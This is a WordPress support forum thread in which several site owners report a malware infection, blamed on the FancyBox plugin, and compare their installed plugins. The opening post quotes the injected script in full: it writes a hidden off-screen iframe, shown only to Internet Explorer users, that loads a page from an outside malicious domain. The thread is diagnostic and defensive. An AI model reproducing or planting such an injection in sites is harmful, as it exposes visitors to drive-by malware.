Support » Plugin: FancyBox for WordPress » Possible malware

  • Resolved SherabGyamtso

    (@sherabgyamtso)


    I have last version of your plugin and WordPress.

    Everything was ok until today. I’ve got a report from sitelock that my Contact page on my blog is infected with malware with iframe redirecting to h t t p : / / 203koko.eu/hjnfh/ipframe2.php

    Chcecked my page source on this contact page and found something like this:

    <script>/*<![CDATA[*/if(navigator.userAgent.match(/msie/i)){document.write(‘ <div style=”position:absolute;left:-2000px;width:2000px”><iframe src=”http://203koko.eu/hjnfh/ipframe2.php” width=”20″ height=”30″ ></iframe></div>’);}/*]]>*/</script>

    I desactivated just Total Cache and this page is not infected anymore.

    I have other plugins (up to date) active:

    Akismet Version 3.0.4
    Custom Posts Per Page Version 1.7.1
    FancyBox for WordPress Version 3.0.2
    GetSocial Version 2.0.1
    NextCellent Gallery Version 1.9.25.1
    Official StatCounter Plugin Version 1.6.9
    Use Google Libraries Version 1.6.2
    WordPress SEO Version 1.7.1

    Can anybody helps me to determine source of this malware?

    Best

    Maciek

    https://wordpress.org/plugins/w3-total-cache/

Viewing 15 replies - 1 through 15 (of 110 total)
  • Total Cache has nothing to do with this, a client of mine got the same code today leading to 203koko.eu, blocked by Google as well for malware, but we can’t find the code in our pages at all which is very strange. Site did not have W3 Total Cache installed.

    The only plugin we have in common is FancyBox for WordPress.

    Can you please mail me at gennady[at]kovshenin[dot]com, I want access to your site to try to find the malware on yours, maybe it will help us find it on ours, since we can’t even get it to show anywhere on the pages although Google found it.

    wslade

    (@wslade)

    Johan Elisson

    (@johan-elisson)

    I have the same problem with http://anglarna.se/ which is a site I’m webmaster for. I can’t seem to find the code snippet anywhere on any of the indicated pages either.

    We have the following plugins (all latest version)
    AdRotate
    Contact Form 7
    Custom Facebook Feed
    Download Manager
    FancyBox for WordPress
    HTML Editor Reloaded
    NextGEN Gallery by Photocrati
    Quick Page/Post Redirect Plugin
    Really Simple CAPTCHA
    Share Buttons by AddToAny
    Surveys
    WP-Polls
    WP to Twitter
    Yoast Breadcrumbs

    Full source of OP’s page here: http://hastebin.com/raw/acawutiwaq for those following the investigation.

    Johan, contact me please. I’m actively investigating this issue and we can help each other, I need access to another infected server to compare files.

    Jan Eckhoff

    (@janeckhoff)

    Hi guys, sorry for using this forum but …

    me and a colleague also had the problem today.

    Both sites got malware listed by Google but on none we could find the code mentioned above.

    Both sites are using “Fancybox for WordPress”. But we have other sites online with that plugin that didn’t got blocked.

    Weird.

    bigant841

    (@bigant841)

    I have the same problem as well with a clients site of mine. I checked every file and there is no indication of this script. Any luck with anyone yet?

    RedKobra

    (@redkobra)

    I have also got “h t t p://203koko.eu/hjnfh/ipframe2.php” on my site. I got a the dreaded email from Google saying my site has malware infected on it. I am currently in contact with Host Gator. They are currently scanning my site for malicious code. I have Total Cache as one of my sites plugins.

    I will keep everyone posted once I hear back from Host Gator.

    Consultis

    (@consultis)

    I too have been hit by this “drive-by” malware today. Half of my morning has been eaten up by this wild good chase. Glad to see I’m not the only one.

    The only overlap I have with plugins from the above posters is FancyBox and Contact Form 7. I do not have the W3 Total Cache plugin.

    I’m tempted to disable FancyBox, as it hasn’t been updated in years. “Easy FancyBox” seems like a suitable replacement.

    areohdeee

    (@areohdeee)

    It’s looking like “Fancybox for WordPress”

    it’s the only PI we have in common with the rest of you.

    bigant841

    (@bigant841)

    I have fancy box as well but disabled it. But this may be the problem that is causing all of our issues.

    RedKobra

    (@redkobra)

    I have Contact Form 7 and Fancybox on my site as well. All my plugins are updated to most current ones.

    Has anoyone been able to actually see the code in question? Seems like it only shows up to Internet Explorer users.

    Johan Elisson

    (@johan-elisson)

    I’ve removed the “Fancybox for WordPress” plugin and requested a review from Google for my site. I’ll report back on the result.

Viewing 15 replies - 1 through 15 (of 110 total)
  • The topic ‘Possible malware’ is closed to new replies.